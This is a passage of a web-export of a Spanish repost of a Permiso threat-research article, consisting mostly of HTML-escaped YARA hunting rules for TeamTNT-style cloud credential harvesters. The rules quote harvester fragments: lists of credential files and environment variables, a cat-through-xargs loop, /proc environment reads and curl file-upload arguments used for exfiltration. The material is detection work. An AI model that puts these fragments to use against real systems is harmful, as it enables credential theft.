<\/span><span>\"5daace86b5e947e8b87d8a00a11bc3c5\"<\/span><span><br\/><\/span>\tstrings:<br\/><span> <\/span><span>$shellHeader_01<\/span><span> = <\/span><span>\"#!\/bin\/sh\"<\/span><span><br\/><\/span><span> <\/span><span>$shellHeader_02<\/span><span> = <\/span><span>\"#!\/bin\/bash\"<\/span><span><br\/><\/span><span> <\/span><span>$envVarAWSPrefixSyntax_01<\/span><span> = <\/span><span>\"<\/span><span>$AWS_<\/span><span>\"<\/span><span><br\/><\/span><span> <\/span><span>$envVarAWSPrefixSyntax_02<\/span><span> = <\/span><span>\"<\/span><span>$AWS_\"<br\/><\/span><span> $envVarAWS_01 = \"AWS_ACCESS_KEY_ID\"<br\/><\/span><span> $envVarAWS_02 = \"AWS_SECRET_ACCESS_KEY\"<br\/><\/span><span> $envVarAWS_03 = \"AWS_SESSION_TOKEN\"<br\/><\/span><span> $envVarAWS_04 = \"AWS_SHARED_CREDENTIALS_FILE\"<br\/><\/span><span> $envVarAWS_05 = \"AWS_CONFIG_FILE\"<br\/><\/span><span> $envVarAWS_06 = \"AWS_DEFAULT_REGION\"<br\/><\/span><span> $envVarAWS_07 = \"AWS_REGION\"<br\/><\/span><span> $envVarAWS_08 = \"AWS_EC2_METADATA_DISABLED\"<br\/><\/span><span> $envVarEcho = \"then echo \"<br\/><\/span><span> $linPEAS_01 = \"#-------) Checks pre-everything (---------#\"<br\/><\/span><span> $linPEAS_02 = \"--) FAST - Do not check 1min of procceses and su brute\"<br\/><\/span><span>\tcondition:<br\/><\/span><span> (any of ($shellHeader*)) and (1 of ($envVarAWSPrefixSyntax*)) and (4 of ($envVarAWS*)) and (#envVarEcho &gt;= 4) and not (all of ($linPEAS*))<br\/><\/span><span><\/span><span><br\/><\/span><span><br\/><\/span><span>rule P0_Hunting_AWS_SedEnvVarExtraction_1 <\/span><span>\"<br\/><\/span><span> <\/span><span>$awsCliConfigureCmd<\/span><span> = \"<\/span><span>aws configure <\/span><span>set<\/span><span> aws_<\/span><span>\"<br\/><\/span><span> <\/span><span>$sedPropAWS_01<\/span><span> = \"<\/span><span>sed <\/span><span>'s# \"AccessKeyId\" : \"#\\n\\naws configure set aws_access_key_id #g'<\/span><span>\"<br\/><\/span><span> <\/span><span>$sedPropAWS_02<\/span><span> = \"<\/span><span>sed <\/span><span>'s# \"SecretAccessKey\" : \"#aws configure set aws_secret_access_key #g'<\/span><span>\"<br\/><\/span><span> <\/span><span>$sedPropAWS_03<\/span><span> = \"<\/span><span>sed <\/span><span>'s# \"Token\" : \"#aws configure set aws_session_token #g'<\/span><span>\"<br\/><\/span><span> <\/span><span>$sedPropAWS_04<\/span><span> = \"<\/span><span>sed <\/span><span>'s# \"Expiration\" : \"#\\n\\nExpiration : #g'<\/span><span>\"<br\/><\/span><span>\tcondition:<br\/><\/span><span> all of them<br\/><\/span><span><br\/><\/span><span><br\/><\/span><span>rule P0_Hunting_Azure_EnvVarNames_1 {<br\/><\/span><span>\tmeta:<br\/><\/span><span> description = \"<\/span><span>Detecting presence of scripts searching <\/span><span>for<\/span><span> numerous environment variables containing sensitive Azure credential information<\/span><span>\"<br\/><\/span><span> author = \"<\/span><span>daniel.bohannon@permiso.io (@danielhbohannon)<\/span><span>\"<br\/><\/span><span> date = \"<\/span><span>2023-07-12<\/span><span>\"<br\/><\/span><span> reference = \"<\/span><span>https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/<\/span><span>\"<br\/><\/span><span> md5_01 = \"<\/span><span>b9113ccc0856e5d44bab8d3374362a06<\/span><span>\"<br\/><\/span><span> md5_02 = \"<\/span><span>d9ecceda32f6fa8a7720e1bf9425374f<\/span><span>\"<br\/><\/span><span> md5_03 = \"<\/span><span>0855b8697c6ebc88591d15b954bcd15a<\/span><span>\"<br\/><\/span><span> md5_04 = \"<\/span><span>f7df739f865448ac82da01b3b1a97041<\/span><span>\"<br\/><\/span><span> md5_05 = \"<\/span><span>1a37f2ef14db460e5723f3c0b7a14d23<\/span><span>\"<br\/><\/span><span> md5_06 = \"<\/span><span>99f0102d673423c920af1abc22f66d4e<\/span><span>\"<br\/><\/span><span> md5_07 = \"<\/span><span>99f0102d673423c920af1abc22f66d4e<\/span><span>\"<br\/><\/span><span> md5_08 = \"<\/span><span>5daace86b5e947e8b87d8a00a11bc3c5<\/span><span>\"<br\/><\/span><span>\tstrings:<br\/><\/span><span> <\/span><span>$envVarAzurePrefixSyntax_01<\/span><span> = \"<\/span><span>$AZURE_<\/span><span>\"<br\/><\/span><span> <\/span><span>$envVarAzurePrefixSyntax_02<\/span><span> = \"<\/span><span>$AZURE_\"<br\/><\/span><span> $envVarAzure_01 = \"AZURE_CREDENTIAL_FILE\"<br\/><\/span><span> $envVarAzure_02 = \"AZURE_GUEST_AGENT_CONTAINER_ID\"<br\/><\/span><span> $envVarAzure_03 = \"AZURE_CLIENT_ID\"<br\/><\/span><span> $envVarAzure_04 = \"AZURE_CLIENT_SECRET\"<br\/><\/span><span> $envVarAzure_05 = \"AZURE_TENANT_ID\"<br\/><\/span><span> $envVarAzure_06 = \"AZURE_SUBSCRIPTION_ID\"<br\/><\/span><span> $envVarEcho = \"then echo \"<br\/><\/span><span>\tcondition:<br\/><\/span><span> (1 of ($envVarAzurePrefixSyntax*)) and (3 of ($envVarAzure*)) and (#envVarEcho &gt;= 3)<br\/><\/span><span><\/span><span><br\/><\/span><br\/>rule P0_Hunting_GCP_CredFileNames_1 <br\/>meta:<br\/><span> description = <\/span><span>\"Detecting presence of scripts searching for numerous Google Cloud Platform (GCP) credential file names. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected.\"<\/span><span><br\/><\/span><span> author = <\/span><span>\"daniel.bohannon@permiso.io (@danielhbohannon)\"<\/span><span><br\/><\/span><span> date = <\/span><span>\"2023-07-12\"<\/span><span><br\/><\/span><span> reference = <\/span><span>\"https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/\"<\/span><span><br\/><\/span><span> md5_01 = <\/span><span>\"b9113ccc0856e5d44bab8d3374362a06\"<\/span><span><br\/><\/span><span> md5_02 = <\/span><span>\"d9ecceda32f6fa8a7720e1bf9425374f\"<\/span><span><br\/><\/span><span> md5_03 = <\/span><span>\"0855b8697c6ebc88591d15b954bcd15a\"<\/span><span><br\/><\/span><span> md5_04 = <\/span><span>\"f7df739f865448ac82da01b3b1a97041\"<\/span><span><br\/><\/span><span> md5_05 = <\/span><span>\"1a37f2ef14db460e5723f3c0b7a14d23\"<\/span><span><br\/><\/span><span> md5_06 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_07 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_08 = <\/span><span>\"5daace86b5e947e8b87d8a00a11bc3c5\"<\/span><span><br\/><\/span>\tstrings:<br\/><span> <\/span><span>$shellHeader_01<\/span><span> = <\/span><span>\"#!\/bin\/sh\"<\/span><span><br\/><\/span><span> <\/span><span>$shellHeader_02<\/span><span> = <\/span><span>\"#!\/bin\/bash\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_01<\/span><span> = <\/span><span>\"active_config\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_02<\/span><span> = <\/span><span>\"gce\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_03<\/span><span> = <\/span><span>\".last_survey_prompt.yaml\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_04<\/span><span> = <\/span><span>\".last_opt_in_prompt.yaml\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_05<\/span><span> = <\/span><span>\".last_update_check.json\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_06<\/span><span> = <\/span><span>\".feature_flags_config.yaml\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_07<\/span><span> = <\/span><span>\"config_default\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_08<\/span><span> = <\/span><span>\"config_sentinel\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_09<\/span><span> = <\/span><span>\"credentials.db\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_10<\/span><span> = <\/span><span>\"access_tokens.db\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_11<\/span><span> = <\/span><span>\"adc.json\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileGCP_12<\/span><span> = <\/span><span>\"resource.cache\"<\/span><span><br\/><\/span><span> <\/span><span>$fileSearchCmd<\/span><span> = <\/span><span>\"find \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_01<\/span><span> = <\/span><span>\"cat \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_02<\/span><span> = <\/span><span>\"strings \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_03<\/span><span> = <\/span><span>\"cp \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_04<\/span><span> = <\/span><span>\"mv \"<\/span><span><br\/><\/span><span> <\/span><span>$linPEAS_01<\/span><span> = <\/span><span>\"#-------) Checks pre-everything (---------#\"<\/span><span><br\/><\/span><span> <\/span><span>$linPEAS_02<\/span><span> = <\/span><span>\"--) FAST - Do not check 1min of procceses and su brute\"<\/span><span><br\/><\/span>\tcondition:<br\/><span> (any of (<\/span><span>$shellHeader<\/span><span>*)) and (5 of (<\/span><span>$credFileGCP<\/span><span>*)) and <\/span><span>$fileSearchCmd<\/span><span> and (any of (<\/span><span>$fileAccessCmd<\/span><span>*)) and not (all of (<\/span><span>$linPEAS<\/span><span>*))<br\/><\/span><\/p><p>rule P0_Hunting_GCP_EnvVarNames_1 {<br\/>meta:<br\/><span> description = <\/span><span>\"Detecting presence of scripts searching for numerous environment variables containing sensitive GCP credential information\"<\/span><span><br\/><\/span><span> author = <\/span><span>\"daniel.bohannon@permiso.io (@danielhbohannon)\"<\/span><span><br\/><\/span><span> date = <\/span><span>\"2023-07-12\"<\/span><span><br\/><\/span><span> reference = <\/span><span>\"https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/\"<\/span><span><br\/><\/span><span> md5_01 = <\/span><span>\"b9113ccc0856e5d44bab8d3374362a06\"<\/span><span><br\/><\/span><span> md5_02 = <\/span><span>\"d9ecceda32f6fa8a7720e1bf9425374f\"<\/span><span><br\/><\/span><span> md5_03 = <\/span><span>\"0855b8697c6ebc88591d15b954bcd15a\"<\/span><span><br\/><\/span><span> md5_04 = <\/span><span>\"f7df739f865448ac82da01b3b1a97041\"<\/span><span><br\/><\/span><span> md5_05 = <\/span><span>\"1a37f2ef14db460e5723f3c0b7a14d23\"<\/span><span><br\/><\/span><span> md5_06 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_07 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_08 = <\/span><span>\"5daace86b5e947e8b87d8a00a11bc3c5\"<\/span><span><br\/><\/span>\tstrings:<br\/><span> <\/span><span>$shellHeader_01<\/span><span> = <\/span><span>\"#!\/bin\/sh\"<\/span><span><br\/><\/span><span> <\/span><span>$shellHeader_02<\/span><span> = <\/span><span>\"#!\/bin\/bash\"<\/span><span><br\/><\/span><span> <\/span><span>$envVarGCPPrefixSyntax_01<\/span><span> = <\/span><span>\"<\/span><span>$GOOGLE_<\/span><span>\"<\/span><span><br\/><\/span><span> <\/span><span>$envVarGCPPrefixSyntax_02<\/span><span> = <\/span><span>\"<\/span><span>$GOOGLE_\"<br\/><\/span><span> $envVarGCP_01 = \"GOOGLE_API_KEY\"<br\/><\/span><span> $envVarGCP_02 = \"GOOGLE_DEFAULT_CLIENT_ID\"<br\/><\/span><span> $envVarGCP_03 = \"GOOGLE_DEFAULT_CLIENT_SECRET\"<br\/><\/span><span> $envVarEcho = \"then echo \"<br\/><\/span><span>\tcondition:<br\/><\/span><span> (any of ($shellHeader*)) and (1 of ($envVarGCPPrefixSyntax*)) and (2 of ($envVarGCP*)) and (#envVarEcho &gt;= 2)<br\/><\/span><span><\/span><span><br\/><\/span><span><br\/><\/span><span>rule P0_Hunting_Common_CredFileNames_1 <br\/><\/span><span>\tmeta:<br\/><\/span><span> description = \"<\/span><span>Detecting presence of scripts searching <\/span><span>for<\/span><span> numerous common credential file names. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected.<\/span><span>\"<br\/><\/span><span> author = \"<\/span><span>daniel.bohannon@permiso.io (@danielhbohannon)<\/span><span>\"<br\/><\/span><span> date = \"<\/span><span>2023-07-12<\/span><span>\"<br\/><\/span><span> reference = \"<\/span><span>https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/<\/span><span>\"<br\/><\/span><span> md5_01 = \"<\/span><span>3e2cddf76334529a14076c3659a68d92<\/span><span>\"<br\/><\/span><span> md5_02 = \"<\/span><span>b9113ccc0856e5d44bab8d3374362a06<\/span><span>\"<br\/><\/span><span> md5_03 = \"<\/span><span>d9ecceda32f6fa8a7720e1bf9425374f<\/span><span>\"<br\/><\/span><span> md5_04 = \"<\/span><span>28165d28693ca807fb3d4568624c5ba9<\/span><span>\"<br\/><\/span><span> md5_05 = \"<\/span><span>0855b8697c6ebc88591d15b954bcd15a<\/span><span>\"<br\/><\/span><span> md5_06 = \"<\/span><span>f7df739f865448ac82da01b3b1a97041<\/span><span>\"<br\/><\/span><span> md5_07 = \"<\/span><span>1a37f2ef14db460e5723f3c0b7a14d23<\/span><span>\"<br\/><\/span><span> md5_08 = \"<\/span><span>99f0102d673423c920af1abc22f66d4e<\/span><span>\"<br\/><\/span><span> md5_09 = \"<\/span><span>99f0102d673423c920af1abc22f66d4e<\/span><span>\"<br\/><\/span><span> md5_10 = \"<\/span><span>5daace86b5e947e8b87d8a00a11bc3c5<\/span><span>\"<br\/><\/span><span>\tstrings:<br\/><\/span><span> <\/span><span>$shellHeader_01<\/span><span> = \"<\/span><span>#!\/bin\/sh\"<\/span><span><br\/><\/span><span> <\/span><span>$shellHeader_02<\/span><span> = <\/span><span>\"#!\/bin\/bash\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_01<\/span><span> = <\/span><span>\"authinfo2\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_02<\/span><span> = <\/span><span>\"access_tokens.db\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_03<\/span><span> = <\/span><span>\".smbclient.conf\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_04<\/span><span> = <\/span><span>\".smbcredentials\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_05<\/span><span> = <\/span><span>\".samba_credentials\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_06<\/span><span> = <\/span><span>\".pgpass\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_07<\/span><span> = <\/span><span>\"secrets\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_08<\/span><span> = <\/span><span>\".boto\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_09<\/span><span> = <\/span><span>\"netrc\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_10<\/span><span> = <\/span><span>\".git-credentials\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_11<\/span><span> = <\/span><span>\"api_key\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_12<\/span><span> = <\/span><span>\"censys.cfg\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_13<\/span><span> = <\/span><span>\"ngrok.yml\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_14<\/span><span> = <\/span><span>\"filezilla.xml\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_15<\/span><span> = <\/span><span>\"recentservers.xml\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_16<\/span><span> = <\/span><span>\"queue.sqlite3\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_17<\/span><span> = <\/span><span>\"servlist.conf\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_18<\/span><span> = <\/span><span>\"accounts.xml\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_19<\/span><span> = <\/span><span>\"kubeconfig\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_20<\/span><span> = <\/span><span>\"adc.json\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_21<\/span><span> = <\/span><span>\"clusters.conf\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_22<\/span><span> = <\/span><span>\"docker-compose.yaml\"<\/span><span><br\/><\/span><span> <\/span><span>$credFileCommon_23<\/span><span> = <\/span><span>\".env\"<\/span><span><br\/><\/span><span> <\/span><span>$fileSearchCmd<\/span><span> = <\/span><span>\"find \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_01<\/span><span> = <\/span><span>\"cat \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_02<\/span><span> = <\/span><span>\"strings \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_03<\/span><span> = <\/span><span>\"cp \"<\/span><span><br\/><\/span><span> <\/span><span>$fileAccessCmd_04<\/span><span> = <\/span><span>\"mv \"<\/span><span><br\/><\/span><span> <\/span><span>$linPEAS_01<\/span><span> = <\/span><span>\"#-------) Checks pre-everything (---------#\"<\/span><span><br\/><\/span><span> <\/span><span>$linPEAS_02<\/span><span> = <\/span><span>\"--) FAST - Do not check 1min of procceses and su brute\"<\/span><span><br\/><\/span>\tcondition:<br\/><span> (any of (<\/span><span>$shellHeader<\/span><span>*)) and (10 of (<\/span><span>$credFileCommon<\/span><span>*)) and <\/span><span>$fileSearchCmd<\/span><span> and (any of (<\/span><span>$fileAccessCmd<\/span><span>*)) and not (all of (<\/span><span>$linPEAS<\/span><span>*))<br\/><\/span><\/p><p>rule P0_Hunting_Common_TeamTNT_CredHarvesterOutputBanner_1 <br\/>meta:<br\/><span> description = <\/span><span>\"Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing specific section banner output commands\"<\/span><span><br\/><\/span><span> author = <\/span><span>\"daniel.bohannon@permiso.io (@danielhbohannon)\"<\/span><span><br\/><\/span><span> date = <\/span><span>\"2023-07-12\"<\/span><span><br\/><\/span><span> reference = <\/span><span>\"https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/\"<\/span><span><br\/><\/span><span> md5_01 = <\/span><span>\"b9113ccc0856e5d44bab8d3374362a06\"<\/span><span><br\/><\/span><span> md5_02 = <\/span><span>\"d9ecceda32f6fa8a7720e1bf9425374f\"<\/span><span><br\/><\/span><span> md5_03 = <\/span><span>\"0855b8697c6ebc88591d15b954bcd15a\"<\/span><span><br\/><\/span><span> md5_04 = <\/span><span>\"f7df739f865448ac82da01b3b1a97041\"<\/span><span><br\/><\/span><span> md5_05 = <\/span><span>\"1a37f2ef14db460e5723f3c0b7a14d23\"<\/span><span><br\/><\/span><span> md5_06 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_07 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_08 = <\/span><span>\"5daace86b5e947e8b87d8a00a11bc3c5\"<\/span><span><br\/><\/span>\tstrings:<br\/><span> <\/span><span>$sectionBanner_01<\/span><span> = <\/span><span>\"-------- AWS INFO ------------------------------------------\"<\/span><span><br\/><\/span><span> <\/span><span>$sectionBanner_02<\/span><span> = <\/span><span>\"-------- EC2 USERDATA -------------------------------------------\"<\/span><span><br\/><\/span><span> <\/span><span>$sectionBanner_03<\/span><span> = <\/span><span>\"-------- GOOGLE DATA --------------------------------------\"<\/span><span><br\/><\/span><span> <\/span><span>$sectionBanner_04<\/span><span> = <\/span><span>\"-------- AZURE DATA --------------------------------------\"<\/span><span><br\/><\/span><span> <\/span><span>$sectionBanner_05<\/span><span> = <\/span><span>\"-------- IAM USERDATA -------------------------------------------\"<\/span><span><br\/><\/span><span> <\/span><span>$sectionBanner_06<\/span><span> = <\/span><span>\"-------- AWS ENV DATA --------------------------------------\"<\/span><span><br\/><\/span><span> <\/span><span>$sectionBanner_07<\/span><span> = <\/span><span>\"-------- PROC VARS -----------------------------------\"<\/span><span><br\/><\/span><span> <\/span><span>$sectionBanner_08<\/span><span> = <\/span><span>\"-------- DOCKER CREDS -----------------------------------\"<\/span><span><br\/><\/span><span> <\/span><span>$sectionBanner_09<\/span><span> = <\/span><span>\"-------- CREDS FILES -----------------------------------\"<\/span><span><br\/><\/span>\tcondition:<br\/>(5 of them)<br\/><\/p><p>rule P0_Hunting_Common_TeamTNT_CredHarvesterTypo_1 {<br\/>meta:<br\/><span> description = <\/span><span>\"Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common typo for 'CREFILE' variable name (assuming intended name is 'CREDFILE' since it is iterating file names in input array\"<\/span><span><br\/><\/span><span> author = <\/span><span>\"daniel.bohannon@permiso.io (@danielhbohannon)\"<\/span><span><br\/><\/span><span> date = <\/span><span>\"2023-07-12\"<\/span><span><br\/><\/span><span> reference = <\/span><span>\"https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/\"<\/span><span><br\/><\/span><span> md5_01 = <\/span><span>\"3e2cddf76334529a14076c3659a68d92\"<\/span><span><br\/><\/span><span> md5_02 = <\/span><span>\"b9113ccc0856e5d44bab8d3374362a06\"<\/span><span><br\/><\/span><span> md5_03 = <\/span><span>\"d9ecceda32f6fa8a7720e1bf9425374f\"<\/span><span><br\/><\/span><span> md5_04 = <\/span><span>\"28165d28693ca807fb3d4568624c5ba9\"<\/span><span><br\/><\/span><span> md5_05 = <\/span><span>\"0855b8697c6ebc88591d15b954bcd15a\"<\/span><span><br\/><\/span><span> md5_06 = <\/span><span>\"f7df739f865448ac82da01b3b1a97041\"<\/span><span><br\/><\/span><span> md5_07 = <\/span><span>\"1a37f2ef14db460e5723f3c0b7a14d23\"<\/span><span><br\/><\/span><span> md5_08 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_09 = <\/span><span>\"99f0102d673423c920af1abc22f66d4e\"<\/span><span><br\/><\/span><span> md5_10 = <\/span><span>\"5daace86b5e947e8b87d8a00a11bc3c5\"<\/span><span><br\/><\/span>\tstrings:<br\/><span> <\/span><span>$varNameTypo<\/span><span> = <\/span><span>\"for CREFILE in <\/span><span>$ xargs -I % sh -c 'echo :::%; cat %' &gt;&gt; $\"<br\/><\/span><span>\tcondition:<br\/><\/span><span> all of them<br\/><\/span><span><\/span><span><br\/><\/span><span><br\/><\/span><span>rule P0_Hunting_Common_TeamTNT_CredHarvesterTypo_2 <br\/><\/span><span>\tmeta:<br\/><\/span><span> description = \"<\/span><span>Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common typo <\/span><span>for<\/span><span> <\/span><span>'get_prov_vars'<\/span><span> <\/span><span>function<\/span><span> name (assuming intended name is <\/span><span>'get_proc_vars'<\/span><span> since it is outputting process variables<\/span><span>\"<br\/><\/span><span> author = \"<\/span><span>daniel.bohannon@permiso.io (@danielhbohannon)<\/span><span>\"<br\/><\/span><span> date = \"<\/span><span>2023-07-12<\/span><span>\"<br\/><\/span><span> reference = \"<\/span><span>https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/<\/span><span>\"<br\/><\/span><span> md5_01 = \"<\/span><span>d9ecceda32f6fa8a7720e1bf9425374f<\/span><span>\"<br\/><\/span><span> md5_02 = \"<\/span><span>0855b8697c6ebc88591d15b954bcd15a<\/span><span>\"<br\/><\/span><span> md5_03 = \"<\/span><span>f7df739f865448ac82da01b3b1a97041<\/span><span>\"<br\/><\/span><span> md5_04 = \"<\/span><span>1a37f2ef14db460e5723f3c0b7a14d23<\/span><span>\"<br\/><\/span><span> md5_05 = \"<\/span><span>99f0102d673423c920af1abc22f66d4e<\/span><span>\"<br\/><\/span><span> md5_06 = \"<\/span><span>99f0102d673423c920af1abc22f66d4e<\/span><span>\"<br\/><\/span><span> md5_07 = \"<\/span><span>5daace86b5e947e8b87d8a00a11bc3c5<\/span><span>\"<br\/><\/span><span>\tstrings:<br\/><\/span><span> <\/span><span>$funcNameTypo<\/span><span> = \"<\/span><span>get_prov_vars<\/span><span>\"<br\/><\/span><span> <\/span><span>$fileAccess_01<\/span><span> = \"<\/span><span>cat <\/span><span>\"<br\/><\/span><span> <\/span><span>$fileAccess_02<\/span><span> = \"<\/span><span>strings <\/span><span>\"<br\/><\/span><span> <\/span><span>$envVarFilePath<\/span><span> = \"<\/span><span> \/proc\/*\/env*<\/span><span>\"<br\/><\/span><span>\tcondition:<br\/><\/span><span> <\/span><span>$funcNameTypo<\/span><span> and (any of (<\/span><span>$fileAccess<\/span><span>*)) and <\/span><span>$envVarFilePath<\/span><span><br\/><\/span><span><br\/><\/span><span><br\/><\/span><span>rule P0_Hunting_Common_TeamTNT_CurlArgs_1 <br\/><\/span><span>\tmeta:<br\/><\/span><span> description = \"<\/span><span>Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common curl arguments including <\/span><span>'Datei'<\/span><span> (German word <\/span><span>for<\/span><span> <\/span><span>'file'<\/span><span>) and specific <\/span><span>'Send=1'<\/span><span> arguments found <\/span><span>in<\/span><span> German blog post https:\/\/administrator.de\/tutorial\/upload-von-dateien-per-batch-curl-und-php-auf-einen-webserver-ohne-ftp-98399.html <\/span><span>which<\/span><span> details using curl (with these specific arguments) to upload files to upload.php<\/span><span>\"<br\/><\/span><span> author = \"<\/span><span>daniel.bohannon@permiso.io (@danielhbohannon)<\/span><span>\"<br\/><\/span><span> date = \"<\/span><span>2023-07-12<\/span><span>\"<br\/><\/span><span> reference = \"<\/span><span>https:\/\/permiso.io\/blog\/s\/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining\/<\/span><span>\"<br\/><\/span><span> md5_01 = \"<\/span><span>b9113ccc0856e5d44bab8d3374362a06<\/span><span>\"<br\/><\/span><span> md5_02 = \"<\/span><span>d9ecceda32f6fa8a7720e1bf9425374f<\/span><span>\"<br\/><\/span><span> md5_03 = \"<\/span><span>0855b8697c6ebc88591d15b954bcd15a<\/span><span>\"<br\/><\/span><span><br\/><\/span><span> md5_04 = \"<\/span><span>f7df739f865448ac82da01b3b1a97041<\/span><span>\"<br\/><\/span><span> md5_05 = \"<\/span><span>1a37f2ef14db460e5723f3c0b7a14d23<\/span><span>\"<br\/><\/span><span> md5_06 = \"<\/span><span>99f0102d673423c920af1abc22f66d4e<\/span><span>\"<br\/><\/span><span> md5_07 = \"<\/span><span>99f0102d673423c920af1abc22f66d4e<\/span><span>\"<br\/><\/span><span> md5_08 = \"<\/span><span>5daace86b5e947e8b87d8a00a11bc3c5<\/span><span>\"<br\/><\/span><span>\tstrings:<br\/><\/span><span> <\/span><span>$curlFileArgGerman<\/span><span> = \"<\/span><span>\"Datei=@\"<\/span><span>\"<br\/><\/span><span> <\/span><span>$curlArgSend<\/span><span> = \"<\/span><span> -F \"Send=1\" <\/span><span>\"<br\/><\/span><span> <\/span><span>$curlArgUsername<\/span><span> = \"<\/span><span> -F \"username=<\/span><span>\"<br\/><\/span><span> <\/span><span>$curlArgPassword<\/span><span> = \"<\/span><span> -F \"password=<\/span><span>\"<br\/><\/span><span>\tcondition:<br\/><\/span><span> all of them<br\/><\/span><span><\/span><\/p><\/code><\/pre>\n<\/div>\n<p><i><b>Nota: <\/b>Este art\u00edculo fue escrito y contribuido de manera experta por el investigador de Permiso, Abian Morina.<\/i><\/p>\n<p><\/p>\n<div class=\"cf note-b\">\u00bfEncontr\u00f3 interesante este art\u00edculo?  Siga con nosotros <a rel=\"nofollow noopener\" href=\"https:\/\/twitter.com\/thehackersnews\" target=\"_blank\">Gorjeo <i class=\"icon-font icon-twitter\">\uf099<\/i><\/a>  y <a rel=\"nofollow noopener\" href=\"https:\/\/www.linkedin.com\/company\/thehackernews\/\" target=\"_blank\">LinkedIn<\/a> para leer m\u00e1s contenido exclusivo que publicamos.<\/div>\n<\/div>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><br \/>\n<br \/><br \/>\n<br \/><a href=\"https:\/\/thehackernews.com\/2023\/08\/agile-approach-to-mass-cloud-credential.html\" rel=\"nofollow noopener\" target=\"_blank\">ttn-es-57<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\ue80223 de agosto de 2023\ue804Las noticias de los piratas inform\u00e1ticosMalware\/Ciberseguridad Los desarrolladores no son las \u00fanicas personas que<\/p>\n","protected":false},"author":1,"featured_media":917660,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[4657,4656,45675,4661,47915,4664,42020,3952,2367,4662,4668,201033,36,5872,4654,201031,4659,4653,4655,10650,18,13344,4666,4665,201032,67208,4660],"class_list":["post-917659","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tecnologia","tag-actualizaciones-ciberneticas","tag-actualizaciones-de-seguridad-cibernetica","tag-agil","tag-ataques-ciberneticos","tag-avecinan","tag-como-hackear","tag-credenciales","tag-criptomineria","tag-enfoque","tag-filtracion-de-datos","tag-la-seguridad-informatica","tag-las-noticias-de-los-piratas-informaticos","tag-los","tag-masiva","tag-noticias-ciberneticas","tag-noticias-de-piratas-informaticos","tag-noticias-de-pirateria","tag-noticias-de-segurid